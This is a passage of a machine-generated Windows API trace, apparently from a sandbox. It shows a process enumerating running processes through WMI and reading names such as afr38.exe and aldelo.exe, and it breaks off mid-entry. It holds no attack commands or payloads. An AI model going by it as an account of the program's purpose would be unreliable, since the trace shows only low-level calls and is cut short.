WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.614] IWbemClassObject:Get (in: This=0x5ecd2a0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fb8d8*=0, plFlavor=0x26fb8dc*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x26fb8d8*=8, plFlavor=0x26fb8dc*=0) returned 0x0 [0225.614] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0225.614] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0225.614] IWbemClassObject:Get (in: This=0x5ecd2a0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fb8d8*=8, plFlavor=0x26fb8dc*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x26fb8d8*=8, plFlavor=0x26fb8dc*=0) returned 0x0 [0225.615] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0225.615] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0225.615] CoTaskMemAlloc (cb=0x4) returned 0x5eca7c8 [0225.615] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca7c8, puReturned=0x26dde18 | out: apObjects=0x5eca7c8*=0x5ecd438, puReturned=0x26dde18*=0x1) returned 0x0 [0225.616] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecd438) returned 0x0 [0225.616] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.616] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.616] IUnknown:AddRef (This=0x5ecd438) returned 0x3 [0225.616] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.616] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.616] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecd43c) returned 0x0 [0225.616] IMarshal:GetUnmarshalClass (in: This=0x5ecd43c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.616] IUnknown:Release (This=0x5ecd43c) returned 0x3 [0225.617] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.617] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.617] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.617] IUnknown:Release (This=0x5ecd438) returned 0x2 [0225.617] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.617] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.617] IUnknown:QueryInterface (in: This=0x5ecd438, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecd438) returned 0x0 [0225.617] IUnknown:AddRef (This=0x5ecd438) returned 0x4 [0225.617] IUnknown:Release (This=0x5ecd438) returned 0x3 [0225.617] IUnknown:Release (This=0x5ecd438) returned 0x2 [0225.617] CoTaskMemFree (pv=0x5eca7c8) [0225.617] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.617] IUnknown:AddRef (This=0x5ecd438) returned 0x3 [0225.617] IWbemClassObject:Get (in: This=0x5ecd438, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.618] IWbemClassObject:Get (in: This=0x5ecd438, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2772\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.618] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2772\"") returned 0x66 [0225.618] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2772\"") returned 0x66 [0225.618] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.618] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.618] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.618] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.619] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca7c8) returned 0x0 [0225.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca7c8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.619] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca7c8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec3028) returned 0x0 [0225.619] WbemDefPath:IUnknown:Release (This=0x5eca7c8) returned 0x0 [0225.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3028, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec3028) returned 0x0 [0225.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3028, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.620] WbemDefPath:IUnknown:AddRef (This=0x5ec3028) returned 0x3 [0225.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3028, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3028, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3028, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca7d8) returned 0x0 [0225.620] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca7d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.620] WbemDefPath:IUnknown:Release (This=0x5eca7d8) returned 0x3 [0225.620] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.620] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3028, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.620] WbemDefPath:IUnknown:Release (This=0x5ec3028) returned 0x2 [0225.620] WbemDefPath:IUnknown:Release (This=0x5ec3028) returned 0x1 [0225.620] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.620] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3028, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec3028) returned 0x0 [0225.621] WbemDefPath:IUnknown:AddRef (This=0x5ec3028) returned 0x3 [0225.621] WbemDefPath:IUnknown:Release (This=0x5ec3028) returned 0x2 [0225.621] WbemDefPath:IWbemPath:SetText (This=0x5ec3028, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2772\"") returned 0x0 [0225.621] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.621] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.621] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.621] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.621] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.621] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.621] IWbemClassObject:Get (in: This=0x5ecd438, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fc13c*=0, plFlavor=0x26fc140*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x26fc13c*=8, plFlavor=0x26fc140*=0) returned 0x0 [0225.621] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0225.621] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0225.621] IWbemClassObject:Get (in: This=0x5ecd438, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fc13c*=8, plFlavor=0x26fc140*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x26fc13c*=8, plFlavor=0x26fc140*=0) returned 0x0 [0225.621] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0225.621] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0225.621] CoTaskMemAlloc (cb=0x4) returned 0x5eca808 [0225.621] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca808, puReturned=0x26dde18 | out: apObjects=0x5eca808*=0x5ecd5d0, puReturned=0x26dde18*=0x1) returned 0x0 [0225.622] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecd5d0) returned 0x0 [0225.623] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.623] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.623] IUnknown:AddRef (This=0x5ecd5d0) returned 0x3 [0225.623] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.623] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.623] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecd5d4) returned 0x0 [0225.623] IMarshal:GetUnmarshalClass (in: This=0x5ecd5d4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.623] IUnknown:Release (This=0x5ecd5d4) returned 0x3 [0225.623] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.623] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.624] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.624] IUnknown:Release (This=0x5ecd5d0) returned 0x2 [0225.624] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.624] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.624] IUnknown:QueryInterface (in: This=0x5ecd5d0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecd5d0) returned 0x0 [0225.624] IUnknown:AddRef (This=0x5ecd5d0) returned 0x4 [0225.624] IUnknown:Release (This=0x5ecd5d0) returned 0x3 [0225.624] IUnknown:Release (This=0x5ecd5d0) returned 0x2 [0225.624] CoTaskMemFree (pv=0x5eca808) [0225.624] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.624] IUnknown:AddRef (This=0x5ecd5d0) returned 0x3 [0225.624] IWbemClassObject:Get (in: This=0x5ecd5d0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.625] IWbemClassObject:Get (in: This=0x5ecd5d0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.625] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"") returned 0x66 [0225.625] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"") returned 0x66 [0225.625] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.625] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.625] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.625] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.626] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca808) returned 0x0 [0225.626] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca808, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.626] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca808, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec3108) returned 0x0 [0225.627] WbemDefPath:IUnknown:Release (This=0x5eca808) returned 0x0 [0225.627] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3108, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec3108) returned 0x0 [0225.627] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3108, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.627] WbemDefPath:IUnknown:AddRef (This=0x5ec3108) returned 0x3 [0225.627] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3108, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.627] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3108, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.627] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3108, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca818) returned 0x0 [0225.627] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca818, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.627] WbemDefPath:IUnknown:Release (This=0x5eca818) returned 0x3 [0225.627] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.628] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3108, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.628] WbemDefPath:IUnknown:Release (This=0x5ec3108) returned 0x2 [0225.628] WbemDefPath:IUnknown:Release (This=0x5ec3108) returned 0x1 [0225.628] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.628] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec3108, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, 